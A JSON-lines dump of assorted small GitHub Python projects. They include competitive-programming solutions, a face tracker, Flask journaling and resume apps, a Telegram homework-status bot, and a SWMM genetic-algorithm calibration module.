ei = q\n for t, x in zip(t_list, x_list):\n if t==1:\n yama[si] = x\n si -= 1\n elif t==2:\n yama[ei] = x\n ei += 1\n elif t==3:\n print(yama[si + x, ])\n \n #yama = []\n #for t, x in zip(t_list, x_list):\n # if t==1:\n # yama = [x] + yama\n # elif t==2:\n # yama.append(x)\n # elif t==3:\n # print(yama[x - 1])\n\n\nif __name__ == \"__main__\":\n q_061_top()\n","repo_name":"zinziroge/atcoder","sub_path":"src/typical90/typical90_061.py","file_name":"typical90_061.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21144087197","text":"import re\n\nclass Regex_solution_ADN():\n @classmethod\n def __init__(self,seq,pattern):\n self.sequence = seq\n self.pattern = pattern\n\n def find_pattern_regex(seq, pat):\n from re import search\n mo = search(pat, seq)\n if (mo != None):\n return mo.span()[0]\n else :\n return -1\n\n def find_all_occurrences_re(seq, pat):\n from re import finditer\n mos = finditer(pat, seq)\n res = []\n for x in mos:\n res.append(x.span()[0])\n return res\n\ndef test():\n seq = input(\"Input sequence:\")\n pat = input(\"Input pattern (as a regular expression):\")\n new = Regex_solution_ADN(seq,pat)\n\n res = new.find_all_occurrences_re(seq, pat)\n if res >= 0:\n print(\"Pattern found in position: \", res)\n else :\n print(\"Pattern not found\")\n\n all_res = new.find_all_occurrences_re(seq, pat)\n if len(all_res) > 0:\n print(\"Pattern found in positions: \", all_res)\n else:\n print(\"Pattern not found\")\ntest()\n","repo_name":"DzungLaif/Bio2","sub_path":"Pattern_In_Sequence/Solution3_RGX_DNA.py","file_name":"Solution3_RGX_DNA.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6602490489","text":"import numpy\n\nfrom scipy.interpolate import interp1d\n\nclass FaceTracker:\n def __init__(self, num_failed_det, min_track, min_face_size) -> None:\n self.num_failed_det = num_failed_det\n self.min_track = min_track\n self.min_face_size = min_face_size\n \n\n \n # CPU: Face tracking \n def track_shot_face_tracker(self, faces) -> list:\n iouThres = 0.3 # Minimum IOU between consecutive face detections\n tracks = []\n while True:\n track = []\n for frameFaces in faces:\n for face in frameFaces:\n if track == []:\n track.append(face)\n frameFaces.remove(face)\n elif face['frame'] - track[-1]['frame'] <= self.num_failed_det:\n iou = self._FaceTracker__bb_intersection_over_union(face['bbox'], track[-1]['bbox'])\n if iou > iouThres:\n track.append(face)\n frameFaces.remove(face)\n continue\n else:\n break\n if track == []:\n break\n elif len(track) > self.min_track:\n frameNum = numpy.array([ f['frame'] for f in track ])\n bboxes = numpy.array([numpy.array(f['bbox']) for f in track])\n frameI = numpy.arange(frameNum[0],frameNum[-1]+1)\n bboxesI = []\n for ij in range(0,4):\n interpfn = interp1d(frameNum, bboxes[:,ij])\n bboxesI.append(interpfn(frameI))\n bboxesI = numpy.stack(bboxesI, axis=1)\n if max(numpy.mean(bboxesI[:,2]-bboxesI[:,0]), numpy.mean(bboxesI[:,3]-bboxesI[:,1])) > self.min_face_size:\n tracks.append({'frame':frameI,'bbox':bboxesI})\n return tracks\n \n def __bb_intersection_over_union(self, boxA, boxB, evalCol = False) -> float:\n # CPU: IOU Function to calculate overlap between two image\n xA = max(boxA[0], boxB[0])\n yA = max(boxA[1], boxB[1])\n xB = min(boxA[2], boxB[2])\n yB = min(boxA[3], boxB[3])\n interArea = max(0, xB - xA) * max(0, yB - yA)\n boxAArea = (boxA[2] - boxA[0]) * (boxA[3] - boxA[1])\n boxBArea = (boxB[2] - boxB[0]) * (boxB[3] - boxB[1])\n if evalCol == True:\n iou = interArea / float(boxAArea)\n else:\n iou = interArea / float(boxAArea + boxBArea - interArea)\n return iou","repo_name":"Zeulni/wellbeing-audio-analysis","sub_path":"src/audio/av_speaker_diarization/face_tracking.py","file_name":"face_tracking.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"13747907982","text":"from src.api.repositories.code_repository import CodeRepository\nfrom src.api.utils.constants import LOCALPATH\n\nimport os\nimport hashlib\n\n\nclass CodeServices:\n def __init__(self):\n self.repository = CodeRepository()\n\n @staticmethod\n def save_file_locally(uid, eid, code_from_user):\n os.makedirs(r\"/\".join([LOCALPATH[\"codes\"], str(uid), str(eid)]), exist_ok=True)\n\n inc = 0\n filepath = r\"/\".join([LOCALPATH[\"codes\"], str(uid), str(eid), str(inc) + \".py\"])\n while os.path.isfile(filepath):\n inc += 1\n filepath = r\"/\".join([LOCALPATH[\"codes\"], str(uid), str(eid), str(inc) + \".py\"])\n\n code_from_user.save(filepath)\n\n return filepath, CodeServices.__hashfile(filepath)\n\n @staticmethod\n def __hashfile(filepath):\n # A arbitrary (but fixed) buffer\n BUF_SIZE = 65536\n\n # Initializing the sha256() method\n sha256 = hashlib.sha256()\n\n with open(filepath, 'rb') as f:\n while True:\n data = f.read(BUF_SIZE)\n if not data:\n break\n\n sha256.update(data)\n condensat = sha256.hexdigest()\n\n return condensat\n","repo_name":"kevinbdx35/api_restfull","sub_path":"src/api/services/code_services.py","file_name":"code_services.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69814950546","text":"import logging\nimport os\nimport sys\nimport time\n\nimport requests\nimport telegram\nfrom dotenv import load_dotenv\n\nfrom exceptions import (ApiNotAllow, DataError, NoneHwName, StatusCodeError,\n StrangeStatus, TokenError)\n\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s, %(levelname)s, %(message)s'\n )\n\nload_dotenv()\n\nPRACTICUM_TOKEN = os.getenv('prac_token')\nTELEGRAM_TOKEN = os.getenv('token')\nTELEGRAM_CHAT_ID = os.getenv('chat_id')\n\nRETRY_PERIOD = 600\nENDPOINT = 'https://practicum.yandex.ru/api/user_api/homework_statuses/'\nHEADERS = {'Authorization': f'OAuth {PRACTICUM_TOKEN}'}\n\nHOMEWORK_VERDICTS = {\n 'approved': 'Работа проверена: ревьюеру всё понравилось. Ура!',\n 'reviewing': 'Работа взята на проверку ревьюером.',\n 'rejected': 'Работа проверена: у ревьюера есть замечания.'\n}\n\n\ndef check_error_list(bot: telegram.Bot, error: Exception) -> None:\n \"\"\"\n Проверяет тип ошибки и наличие сообщения о ней в глобальном списке ошибок.\n При отсутсвии сообщения о такой ошибки добавляет ее в список.\n Отправляет сообщение об ошибки в чат бота, если ошибки не было в списке.\n Логирует все типы ошибок.\n \"\"\"\n #Типы ошибок, о которых следует единажды отправлять сообщение в чат бота.\n global ERROR_LIST\n e_types_for_chat = (DataError, NoneHwName, TypeError, StrangeStatus)\n if type(error) in e_types_for_chat and str(error) not in ERROR_LIST:\n ERROR_LIST.append(str(error))\n send_message(bot, str(error))\n logging.error(f'Сбой в работе программы: {error}')\n\n\ndef check_tokens() -> None:\n \"\"\"Проверяет доступность переменных окружения.\"\"\"\n vars = (PRACTICUM_TOKEN, TELEGRAM_TOKEN, TELEGRAM_CHAT_ID)\n if not all(vars):\n logging.critical('Токены отсутствуют или имеют не верный тип')\n raise TokenError()\n\n\ndef send_message(bot: telegram.Bot, message: str) -> None:\n \"\"\"Отправляет сообщение в Telegram чат.\"\"\"\n try:\n bot.send_message(chat_id=TELEGRAM_CHAT_ID, text=message)\n logging.debug('Сообщение успешно отправлено в чат')\n except telegram.error.TelegramError as e:\n logging.error(f'Ошибка отправки сообщения {e}')\n\n\ndef get_api_answer(timestamp: int) -> dict:\n \"\"\"Делает запрос к эндпоинту API-сервиса.\"\"\"\n try:\n response = requests.get(\n ENDPOINT, headers=HEADERS,\n params={'from_date': timestamp}\n )\n except Exception as e:\n logging.error(f'Ошибка запроса к API {e}')\n raise ApiNotAllow()\n else:\n if response.status_code != 200:\n logging.error(f'Статус-код ответа: {response.status_code}')\n raise StatusCodeError()\n return response.json()\n\n\ndef check_response(response: dict) -> None:\n \"\"\"Проверяет ответ API на соответствие документации.\"\"\"\n expected_key: str = 'homeworks'\n if type(response) != dict:\n raise TypeError('Неверный тип данных в ответе на запрос')\n if expected_key not in response:\n raise DataError('В ответе API нет нужных данных')\n if type(response['homeworks']) != list:\n raise TypeError('Неверный тип данных по ключу \"homeworks\"')\n\n\ndef parse_status(homework: dict) -> str:\n \"\"\"Извлекает из информации о домашней работе статус этой работы.\"\"\"\n homework_name: str = homework.get('homework_name')\n if not homework_name:\n raise NoneHwName('Нет названия домашней работы')\n status: str = homework.get('status')\n verdict: str = HOMEWORK_VERDICTS.get(status)\n if not verdict:\n raise StrangeStatus('Получен нестандартный статус домашней работы')\n return f'Изменился статус проверки работы \"{homework_name}\". {verdict}'\n\n\ndef main() -> None:\n \"\"\"\n Делает запрос к API домашних работ.\n При наличии обновлений или ошибок отправляет сообщение о событии в чат.\n \"\"\"\n current_hw_status = {}\n check_tokens()\n bot = telegram.Bot(token=TELEGRAM_TOKEN)\n timestamp = int(time.time())\n\n while True:\n new_updates = 0\n try:\n response = get_api_answer(timestamp)\n check_response(response)\n homeworks = response.get('homeworks')\n for hw in homeworks:\n hw_id: int = hw.get('id')\n cur_message: str = current_hw_status.setdefault(hw_id, '')\n resp_message: str = parse_status(hw)\n if resp_message != cur_message:\n current_hw_status[hw_id] = resp_message\n send_message(bot, resp_message)\n new_updates += 1\n except Exception as e:\n check_error_list(bot, e)\n finally:\n if not new_updates:\n logging.debug('Нет новых обновлений')\n time.sleep(RETRY_PERIOD)\n\n\nif __name__ == '__main__':\n ERROR_LIST = []\n\n logger = logging.getLogger(__name__)\n handler = logging.StreamHandler(sys.stdout)\n logger.addHandler(handler)\n try:\n main()\n except Keyboardinterrupt:\n logging.info(f'Принудительная остановка бота')\n \n","repo_name":"ddr533/homework_bot","sub_path":"homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":6003,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"73839969107","text":"'''21 Вариант Скляров Владимир. Группа: ИС-23.'''\n\n'''\n Дан целочисленный список размера N. Если он является перестановкой, то есть\n содержит все числа от 1 до N, то вывести 0; в противном случае вывести номер\n первого недопустимого элемента.'''\n\ntry:\n number = int(input(\"Введите число: \"))\n list_1 = []\n for i in range(1, number+1):\n list_1.append(i)\n n = [i for i in range(1, number+1)]\n if list_1 == n:\n print(0)\n else:\n m = 0\n print(list_1)\n print(n)\n for i in list_1:\n if m == len(n):\n m = m - 1\n if i != n[m]:\n print(f\"Первый недопустимый элемент: {m}\")\n m += 1\n\nexcept ValueError:\n print(\"Ошибка\")\n","repo_name":"Foo0s/Proj_1sem_Sklyarov","sub_path":"PZ_6/PZ_6_2.py","file_name":"PZ_6_2.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72186455505","text":"#!/usr/bin/env python3\n\nimport os\nimport pathlib\nimport sys\n\nYEAR_NAMES = {\n 2015: \"twentyfifteen\",\n 2016: \"twentysixteen\",\n 2017: \"twentyseventeen\",\n 2018: \"twentyeighteen\",\n 2019: \"twentynineteen\",\n 2020: \"twentytwenty\",\n 2021: \"twentytwentyone\",\n}\n\nDAY_NAME = {\n 1: \"one\",\n 2: \"two\",\n 3: \"three\",\n 4: \"four\",\n 5: \"five\",\n 6: \"six\",\n 7: \"seven\",\n 8: \"eight\",\n 9: \"nine\",\n 10: \"ten\",\n 11: \"eleven\",\n 12: \"twelve\",\n 13: \"thirteen\",\n 14: \"fourteen\",\n 15: \"fifteen\",\n 16: \"sixteen\",\n 17: \"seventeen\",\n 18: \"eighteen\",\n 19: \"nineteen\",\n 20: \"twenty\",\n 21: \"twenty_one\",\n 22: \"twenty_two\",\n 23: \"twenty_three\",\n 24: \"twenty_four\",\n 25: \"twenty_five\",\n}\n\n\ndef make_directories(year: int):\n input_dir = f\"./input/{year}/\"\n prog_dir = f\"./{YEAR_NAMES[year]}/\"\n pathlib.Path.mkdir(pathlib.Path(input_dir), exist_ok=True)\n pathlib.Path.mkdir(pathlib.Path(prog_dir), exist_ok=True)\n\n\ndef get_filename_with_ext(day: int, ext: str) -> str:\n dayname = DAY_NAME[day]\n dayname = dayname.replace(\"_\", \"\")\n return f\"day_{dayname}.{ext}\"\n\n\ndef gen_input_file(year: int, day: int):\n filename = get_filename_with_ext(day, \"txt\")\n filepath = f\"./input/{year}/{filename}\"\n with open(filepath, mode=\"a\"):\n pass\n\n\ndef get_function_template(day: int, side: bool) -> str:\n dayname = DAY_NAME[day].title().replace(\"_\", \"\")\n if side:\n s = \"A\"\n else:\n s = \"B\"\n return \"\\n\".join(\n [\n f\"func Day{dayname}{s}(fp *bufio.Reader) string {{\",\n ' return \"\"',\n \"}\",\n \"\",\n ]\n )\n\n\ndef gen_impl_file(year: int, day: int):\n filename = get_filename_with_ext(day, \"go\")\n modulename = YEAR_NAMES[year]\n filepath = f\"./{modulename}/{filename}\"\n if os.path.exists(filepath):\n return\n with open(filepath, mode=\"w\") as fp:\n fp.writelines(\n [\n f\"package {modulename}\\n\\n\",\n 'import \"bufio\"\\n\\n',\n get_function_template(day, True),\n \"\\n\",\n get_function_template(day, False),\n ]\n )\n\n\ndef gen_templates(year: int, day: int):\n make_directories(year)\n gen_input_file(year, day)\n gen_impl_file(year, day)\n\n\ndef main():\n args = sys.argv[1:]\n year = int(args[0])\n day = int(args[1])\n if len(args) != 2:\n print(\"Usage: ./newproblem.py [year] [day]\")\n\n if year < 2015 or year > 2021:\n print(f\"Invalid year: {year}\")\n return\n\n if day < 1 or day > 25:\n print(f\"Invalid day: {day}\")\n return\n\n gen_templates(year, day)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"biesnecker/godvent","sub_path":"newproblem.py","file_name":"newproblem.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31927818376","text":"# A file to do the application initialization.\n\nfrom flask import Flask, request, jsonify\nfrom flask_migrate import Migrate\nfrom flask_bcrypt import Bcrypt\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker, scoped_session\n\n# App Definition\napp = Flask(__name__)\napp.config.update(\n PROPAGATE_EXCEPTIONS = True\n)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'\n\n# Encrypt and set up database\nbcrypt = Bcrypt(app)\ndb = SQLAlchemy(app)\ndb.init_app(app)\nmigrate = Migrate(app, db)\n\n# Create a session for the app to connect to the database\napp.config['SQLALCHEMY_DATABASE_URI']\nengine = create_engine(app.config['SQLALCHEMY_DATABASE_URI'], echo=False)\nsm = sessionmaker(bind=engine)\nDBSession = scoped_session(sm)\n\n__all__ = ['app', 'bcrypt', 'db', 'DBSession', 'migrate']\n","repo_name":"sconnel42/automation-server","sub_path":"app_def.py","file_name":"app_def.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29779186253","text":"from flask import Blueprint, render_template, request, url_for, flash, redirect\nfrom flask_login import login_required, current_user\nfrom datetime import datetime\nfrom . import db\nfrom .models import Author, Post\n\nmain = Blueprint('main', __name__)\n\n@main.route('/')\ndef index():\n return render_template('index.html')\n\n@main.route('/profile')\n@login_required\ndef profile():\n return render_template('profile.html', name=current_user.name)\n \n@main.route('/journal')\n@login_required\ndef journal():\n ROWS_PER_PAGE = 10\n page = request.args.get('page', 1, type=int)\n\n posts = Post.query.paginate(page=page, per_page=ROWS_PER_PAGE)\n return render_template('journal.html', posts = posts)\n\n@main.route('/create', methods=['GET', 'POST'])\n@login_required\ndef create():\n if request.method == 'POST':\n init_mood = request.form.get('imood')\n title = request.form['title']\n content = request.form['content']\n final_mood = request.form.get('pmood')\n \n if not title:\n flash('Title is required!')\n elif not content:\n flash('Content is required!')\n elif not init_mood:\n flash('How were you feeling before writing?')\n elif not final_mood:\n flash('How were you feeling after writing?')\n else:\n\n new_add = Post(title=title, content='created: ' + str(datetime.now()) + ' -- ' + content, init_mood=init_mood, final_mood=final_mood)\n db.session.add(new_add)\n db.session.commit()\n\n return redirect(url_for('main.index'))\n return render_template('create.html', name=current_user.name)\n\n@main.route('//edit/', methods=('GET', 'POST'))\n@login_required\ndef edit(id):\n post = db.session.query(Post).get(id)\n\n if request.method == 'POST':\n init_mood = request.form.get('imood')\n title = request.form['title']\n content = request.form['content']\n final_mood = request.form.get('pmood')\n\n if not title:\n flash('Title is required!')\n elif not content:\n flash('Content is required!')\n elif not init_mood:\n flash('How were you feeling before writing?')\n elif not final_mood:\n flash('How were you feeling after writing?')\n else:\n post.title = title\n post.content = content\n post.init_mood = init_mood\n post.final_mood = final_mood\n db.session.commit()\n \n new_add = Post(title=title, content=content + ' -- edited: ' + str(datetime.now()), init_mood=init_mood, final_mood=final_mood)\n db.session.add(new_add)\n db.session.commit()\n\n return redirect(url_for('main.index'))\n\n return render_template('edit.html', post=post)\n\n\n@main.route('/speak', methods=('GET', 'POST'))\n@login_required\ndef speak():\n if request.method == 'POST':\n init_mood = request.form.get('imood')\n title = request.form['title']\n content = request.form['content']\n final_mood = request.form.get('pmood')\n\n if not title:\n flash('Title is required!')\n elif not content:\n flash('Content is required!')\n elif not init_mood:\n flash('How were you feeling before writing?')\n elif not final_mood:\n flash('How were you feeling after writing?')\n else:\n\n new_add = Post(title=title, content=content, init_mood=init_mood, final_mood=final_mood)\n db.session.add(new_add)\n db.session.commit()\n\n return redirect(url_for('main.index'))\n return render_template('speak.html')\n","repo_name":"H-Len/VentOn","sub_path":"project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2157082574","text":"from django.shortcuts import render, redirect\nfrom .models import *\nfrom .forms import *\nfrom django.http import HttpResponse\n\ndef home(request):\n if request.method == 'POST':\n form = StudentForm(request.POST)\n # print(form)\n if form.is_valid():\n form.save()\n obj = Student.objects.all().order_by('-id').first() \n return redirect('profile',obj.id)\n if request.method == 'GET':\n form = StudentForm()\n c = {\n 'form': form,\n }\n return render(request, 'home.html',c)\n\ndef profile(request, pk):\n \n if request.method == 'GET':\n std = Student.objects.get(id=pk)\n c = {\n 'std': std,\n }\n return render(request, 'resume.html',c)\n ","repo_name":"aswathypmukesh/reume-generator","sub_path":"res/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15978485489","text":"import random\r\nimport DelineateNetwork\r\nimport numpy as np\r\nimport FileSettings\r\nimport CreateGuesses\r\nimport Objective_functions\r\nimport Generations\r\n\r\n\r\ndef read_initial_parameters(inputfilename):\r\n subc_params = []\r\n subarea_params = []\r\n global subc_names\r\n subc_names = []\r\n subcatchment_parameters = []\r\n inputfile = open(inputfilename, 'r')\r\n for line in inputfile:\r\n if(line.find(\"[SUBCATCHMENTS]\") != -1):\r\n line = inputfile.readline()\r\n for i in range(CreateGuesses.count):\r\n templine = list(line)\r\n if templine[0] == \";\" or templine[0] == \" \" or len(templine) < 10:\r\n line = inputfile.readline()\r\n continue\r\n\r\n elif (line.find(\"[\") != -1):\r\n break\r\n else:\r\n linesplit = line.split()\r\n subc_params.append(linesplit[4:7])\r\n subc_names.append(linesplit[0])\r\n line = inputfile.readline()\r\n if (line.find(\"[SUBAREAS]\") != -1):\r\n line = inputfile.readline()\r\n for i in range(CreateGuesses.count):\r\n templine = list(line)\r\n if templine[0] == \";\" or templine[0] == \" \" or len(templine) < 10:\r\n line = inputfile.readline()\r\n continue\r\n elif (line.find(\"[\") != -1):\r\n break\r\n else:\r\n linesplit = line.split()\r\n subarea_params.append(linesplit[1:6])\r\n line = inputfile.readline()\r\n inputfile.close()\r\n for i in range(len(subc_params)):\r\n for j in range(len(subarea_params[i])):\r\n subc_params[i].append(subarea_params[i][j])\r\n subcatchment_parameters.append(subc_params[i])\r\n return(subcatchment_parameters)\r\n#read_initial_parameters(inputfilename)\r\n\r\n\r\ndef transformation_flatten(twoDlistinput):\r\n oneDlistoutput = []\r\n for i in range(len(twoDlistinput)):\r\n for j in range(len(twoDlistinput[i])):\r\n oneDlistoutput.append(twoDlistinput[i][j])\r\n return(oneDlistoutput)\r\n\r\n\r\ndef compile_initial_guess(inputfilename):\r\n global relevant_subcatchment_indices, relevant_subcatchment_parameters\r\n relevant_subcatchment_indices = []\r\n for allsub in CreateGuesses.subc_names:\r\n for upstreamsub in DelineateNetwork.list_of_subcatchments:\r\n if allsub == upstreamsub:\r\n relevant_subcatchment_indices.append(CreateGuesses.subc_names.index(allsub))\r\n relevant_subcatchment_parameters = []\r\n for i in relevant_subcatchment_indices:\r\n relevant_subcatchment_parameters.append(read_initial_parameters(inputfilename)[i])\r\n initial_guess_flat = transformation_flatten(relevant_subcatchment_parameters)\r\n return(initial_guess_flat)\r\n#compile_initial_guess(inputfilename)\r\n\r\n\r\ndef caststringsasfloats(parameterlist):\r\n initial_guess_floats = []\r\n for guess in parameterlist:\r\n initial_guess_floats.append(float(guess))\r\n return(initial_guess_floats)\r\n\r\ndef createrandomsetofP(survivinglist):\r\n floatnexttemporaryguess = caststringsasfloats(crossover(survivinglist))\r\n for parameter in range(len(floatnexttemporaryguess)):\r\n binary_setter = random.uniform(0,1)\r\n if binary_setter > 0.1:\r\n continue\r\n else:\r\n if parameter % 8 == 0:\r\n floatnexttemporaryguess[parameter] = random.uniform(CreateGuesses.percentimpervious[0], CreateGuesses.percentimpervious[1])\r\n elif parameter % 8 == 1:\r\n floatnexttemporaryguess[parameter] = random.uniform(CreateGuesses.width[0], CreateGuesses.width[1])\r\n elif parameter % 8 == 2:\r\n floatnexttemporaryguess[parameter] = random.uniform(CreateGuesses.slope[0], CreateGuesses.slope[1])\r\n elif parameter % 8 == 3:\r\n floatnexttemporaryguess[parameter] = random.uniform(CreateGuesses.impervious_n[0], CreateGuesses.impervious_n[1])\r\n elif parameter % 8 == 4:\r\n floatnexttemporaryguess[parameter] = random.uniform(CreateGuesses.pervious_n[0], CreateGuesses.pervious_n[1])\r\n elif parameter % 8 == 5:\r\n floatnexttemporaryguess[parameter] = random.uniform(CreateGuesses.impervious_storage[0], CreateGuesses.impervious_storage[1])\r\n elif parameter % 8 == 6:\r\n floatnexttemporaryguess[parameter] = random.uniform(CreateGuesses.pervious_storage[0], CreateGuesses.pervious_storage[1])\r\n elif parameter % 8 == 7:\r\n floatnexttemporaryguess[parameter] = random.uniform(CreateGuesses.percent_zero_storage[0], CreateGuesses.percent_zero_storage[1])\r\n return(floatnexttemporaryguess)\r\n\r\n\r\ndef fillmatingpool(survivinglist):\r\n matingpool =[]\r\n dummylist = [x for x in survivinglist]\r\n for i in range(FileSettings.geneticdict['population']+10):\r\n choice1 = random.choice(dummylist)\r\n choice2 = random.choice(dummylist)\r\n while choice2 == choice1:\r\n choice2 = random.choice(dummylist)\r\n if Objective_functions.par_aggFunc[survivinglist.index(choice1)] < \\\r\n Objective_functions.par_aggFunc[survivinglist.index(choice2)]:\r\n matingpool.append(choice1)\r\n dummylist.remove(choice1)\r\n else:\r\n matingpool.append(choice2)\r\n dummylist.remove(choice2)\r\n\r\n global not_selected_list\r\n not_selected_list = dummylist\r\n return(matingpool)\r\n\r\n\r\ndef crossover(survivinglist):\r\n choice1 = random.choice(survivinglist)\r\n survivinglist.remove(choice1)\r\n choice2 = random.choice(survivinglist)\r\n #while choice2 == choice1:\r\n #choice2 = random.choice()\r\n choices = [choice1, choice2]\r\n Objective_functions.readobservationfile(FileSettings.settingsdict['observationdatafile'])\r\n Objective_functions.objectivefunctions(choices, FileSettings.settingsdict['observationdatafile'],\r\n FileSettings.settingsdict['distancefilename'],\r\n FileSettings.settingsdict['root'])\r\n guesses_Agg = Objective_functions.aggregateFunction()\r\n betterguess = choices[guesses_Agg.index(min(guesses_Agg))]\r\n worserguess = choices[guesses_Agg.index(max(guesses_Agg))]\r\n bettertemporaryguess = compile_initial_guess(betterguess)\r\n worsertemporaryguess = compile_initial_guess(worserguess)\r\n threshhold = random.uniform(0, FileSettings.geneticdict['crossover_bias'])\r\n for param in bettertemporaryguess:\r\n crossover_setter = random.uniform(0, 1)\r\n if crossover_setter > (threshhold + FileSettings.geneticdict['crossover_bias']):\r\n continue\r\n else:\r\n store = param\r\n worsertemporaryguess[bettertemporaryguess.index(param)] = store\r\n return(worsertemporaryguess)\r\n\r\n\r\ndef castfloatsasstrings(survivinglist):\r\n floattostring = createrandomsetofP(survivinglist)\r\n guess_strings = []\r\n for float in floattostring:\r\n guess_strings.append(str(float))\r\n return(guess_strings)\r\n\r\ndef transformation_fatten(oneDlistinput):\r\n new_twoDlistoutput = np.zeros((len(relevant_subcatchment_parameters[0]),len(relevant_subcatchment_parameters)))\r\n row_count = -1\r\n col_count = 0\r\n for oneDparameter in oneDlistinput:\r\n row_count = row_count + 1\r\n if row_count < len(relevant_subcatchment_parameters[0]):\r\n new_twoDlistoutput[row_count][col_count] = oneDparameter\r\n else:\r\n row_count = 0\r\n col_count = col_count + 1\r\n new_twoDlistoutput[row_count][col_count] = oneDparameter\r\n return(new_twoDlistoutput)\r\n\r\ndef insertguessestoinputfile(inputfilename, trialfile, survivinglist):\r\n guess = transformation_fatten(castfloatsasstrings(survivinglist))\r\n\r\n with open(inputfilename, 'r') as swmmput:\r\n contents = swmmput.readlines()\r\n swmmput.seek(0)\r\n for line in swmmput:\r\n if line.find('[SUBCATCHMENTS]') != -1:\r\n for i in range(CreateGuesses.count):\r\n line = swmmput.readline()\r\n linelist = list(line)\r\n if linelist[0] == \" \" or linelist[0] == \";\" or len(linelist) < 10:\r\n continue\r\n elif (line.find('[SUBAREAS]') != -1):\r\n break\r\n else:\r\n for sub in DelineateNetwork.list_of_subcatchments:\r\n templine = contents.index(line)\r\n splitline = contents[templine].split()\r\n if splitline[0] == sub:\r\n splitline[4] = str(guess[0][DelineateNetwork.list_of_subcatchments.index(sub)])\r\n splitline[5] = str(guess[1][DelineateNetwork.list_of_subcatchments.index(sub)])\r\n splitline[6] = str(guess[2][DelineateNetwork.list_of_subcatchments.index(sub)])\r\n contents[templine] = \" \".join(splitline) + \"\\n\"\r\n break\r\n if line.find('[SUBAREAS]') != -1:\r\n for i in range(CreateGuesses.count):\r\n line = swmmput.readline()\r\n linelist = list(line)\r\n if linelist[0] == \" \" or linelist[0] == \";\" or len(linelist) < 10:\r\n continue\r\n elif (line.find('[') != -1):\r\n break\r\n else:\r\n for sub in DelineateNetwork.list_of_subcatchments:\r\n templine = contents.index(line)\r\n splitline = contents[templine].split()\r\n if splitline[0] == sub:\r\n splitline[1] = str(guess[3][DelineateNetwork.list_of_subcatchments.index(sub)])\r\n splitline[2] = str(guess[4][DelineateNetwork.list_of_subcatchments.index(sub)])\r\n splitline[3] = str(guess[5][DelineateNetwork.list_of_subcatchments.index(sub)])\r\n splitline[4] = str(guess[6][DelineateNetwork.list_of_subcatchments.index(sub)])\r\n splitline[5] = str(guess[7][DelineateNetwork.list_of_subcatchments.index(sub)])\r\n contents[templine] = \" \".join(splitline) + '\\n'\r\n break\r\n with open(trialfile, 'w') as newfile:\r\n for i in range(CreateGuesses.count):\r\n newfile.write(contents[i])\r\n newfile.close()\r\n return\r\n\r\n\r\ndef create_next_generation(inputfilename, filelist, survivinglist):\r\n for trialfile in filelist:\r\n insertguessestoinputfile(inputfilename, trialfile, survivinglist)\r\n return\r\n\r\n","repo_name":"edwardtiernan/snake_game","sub_path":"NextGuesses.py","file_name":"NextGuesses.py","file_ext":"py","file_size_in_byte":10935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31631859113","text":"import tkinter as tk\r\nfrom tkinter import messagebox\r\n\r\nwn = tk.Tk()\r\n\r\n\r\ndef timeInWords(h, m):\r\n naming_time = [\"one\",\"two\",\"three\",\"four\",\"five\",\"six\",\"seven\",\"eight\",\"nine\",\"ten\",\"eleven\",\"twelve\"]\r\n naming_session = [\"one minute\",\"two minutes\",\"three minutes\",\"four minutes\",\"five minutes\",\"six minutes\",\"seven minutes\",\"eight minutes\",\"nine minutes\",\r\n\"ten minutes\",\"eleven minutes\",\"twelve minutes\",\"thirteen minutes\",\"fourteen minutes\",\"quarter\", \"sixteen minutes\",\"seventeen minutes\", \"eighteen minutes\",\r\n\"nineteen minutes\",\"twenty minutes\",\"twenty one minutes\",\"twenty two minutes\",\"twenty three minutes\",\"twenty four minutes\",\"twenty five minutes\",\r\n\"twenty six minutes\",\"twenty seven minutes\",\"twenty eight minutes\",\"twenty nine minutes\"]\r\n if m == 0:\r\n return (naming_time[h-1] + \" o' clock\")\r\n elif m < 30:\r\n return (naming_session[m-1] + \" past \" + naming_time[h-1])\r\n elif m > 30:\r\n m = 60 - m\r\n return (naming_session[m-1] + \" to \" + naming_time[h])\r\n else:\r\n return (\"half past \" + naming_time[h-1]) \r\n \r\ntime_entry = tk.Entry(wn)\r\noutput_label = tk.Label(wn, text = \" \" , ) \r\n\r\n\r\nh , m = map(int, input().split(\":\"))\r\n\r\nresult = timeInWords(h, m)\r\n\r\nprint(result + '\\n')\r\n\r\nwn.mainloop()","repo_name":"Sunillad08/Python_code","sub_path":"Timing clock.py","file_name":"Timing clock.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12195258672","text":"import matplotlib.pyplot as 